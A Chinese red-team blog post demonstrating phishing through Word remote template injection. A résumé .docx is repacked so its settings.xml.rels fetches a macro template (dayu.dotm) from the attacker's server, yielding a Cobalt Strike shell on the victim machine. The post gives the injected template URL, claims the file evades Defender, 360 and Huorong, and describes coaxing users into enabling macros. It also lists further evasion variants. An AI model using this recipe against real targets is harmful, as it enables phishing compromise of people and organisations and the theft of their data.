渗透地基钓鱼篇-Word文档注入执行恶意宏
文章来源:潇湘信安
0x01 前言
网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。
网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。
这篇主要演示如何创建Word文档进行钓鱼,并控制对方,该方法也是红队常用的钓鱼方式之一,利用的是分离免杀!最后还会写一点思路!
0x02 环境介绍
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4
VPS服务器:
目前演示是用kali来架设做VPS公网服务器的!道理意义一样!
办公电脑:
系统:windwos10
IP:192.168.1.208
0x03 Word文档注入后门宏演示
在桌面基础创建文档名称:dayu.docx
这里简单测试,是测试CS生成的shell和本机是互联的,确保能拿到对方控制权限!
右键点打开!(必须右键点打开!)
将后门宏文件dayu.dotm上传到公网服务器中(这里用kali进行模拟)
目前文档类型非常多,我已简历为主!这里创建一个简历模版保存到桌面即可!
修改文件名:docx改为zip类型!!
将zip文件解压,进入/word/_rels目录下,打开settings.xml.rels宏文件,这段就是宏需要执行的代码…!
file:///C:\Users\yujun\AppData\Roaming\Microsoft\Templates\精美简历,由%20MOO%20设计.dotxhttp://192.168.1.9:8001/dayu.dotm然后将内容重新压缩后,在修改zip为docx类型,修改后可看到就是我的简历了!
这里利用的是分离免杀的方法,里面的代码都是正常的,由于杀毒软件是静态查杀,所以无法查杀的!
可看到通过下载该简历文件,微软、360、火绒都是不查杀的!
该工程中的宏被禁止,请...........是否激活...那么安全意识强的肯定是点X,安全意识差的,点确定,都没关系!钓鱼嘛,主要钓鱼安全意识差,又不懂安全的人,社会太多太多了~~所以要加强安全意识啊!
这里点击确定或者关闭点X关掉该框框,都意义不大,主要的意思是提醒用户,左上角可以启用内容!!!使用宏!!!正常浏览简历!!!
那么左上角还有个安全警告,点击启用内容!!
可看到成功获得办公电脑192.168.1.208的控制权限!!
0x04 另外思路
另外思路:
1. 打开WPS创建宏是暗色的需要安装VBA for WPS才可以写WPS宏病毒代码执行!2. Office和WPS中还可以隐藏文字,可以利用该方式通过配合录制宏的方法,用该方式执行…3. Normal模块下,不止能编写一个settings.xml.rels…可以多宏…4. 弹框执行代码写入宏,那么Excel、PPT等也写…5. 不止docx宏,还有很多,能另存文件内容的都可以…
还有前面也提了混淆,就到这里,不在往下说了…提高安全意识吧~~
今天基础牢固就到这里,虽然基础,但是必须牢记于心。
如侵权请私聊公众号删文